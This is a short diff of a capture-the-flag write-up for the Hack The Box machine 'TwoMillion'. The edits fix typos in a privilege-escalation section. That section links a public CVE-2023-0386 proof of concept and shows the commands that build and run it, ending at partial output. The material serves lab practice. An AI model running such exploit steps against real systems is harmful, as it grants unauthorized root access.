krypten/ctf-workbook/ctf/htb/machines/easy/twomillion.md

 Based on this information, we can search online for public vulnerabilities.
 Here the POC for exploit - https://github.com/sxlmnwb/CVE-2023-0386

-In the first terminal, we woudl be executing the executable.
+In the first terminal, we would be executing the executable.
 ```
 admin@2million:~/CVE-2023-0386-master$ make all
 admin@2million:~/CVE-2023-0386-master$ ./fuse ./ovlcap/lower ./gc
 admin@2million:~/CVE-2023-0386-master$ ./exp
 ```

-Termial 2, doing the same:
+Terminal 2, doing the same:
 ```
 admin@2million:~/CVE-2023-0386-master$ ./exp
 uid:1000 gid:1000
 [+] mount success
 total 8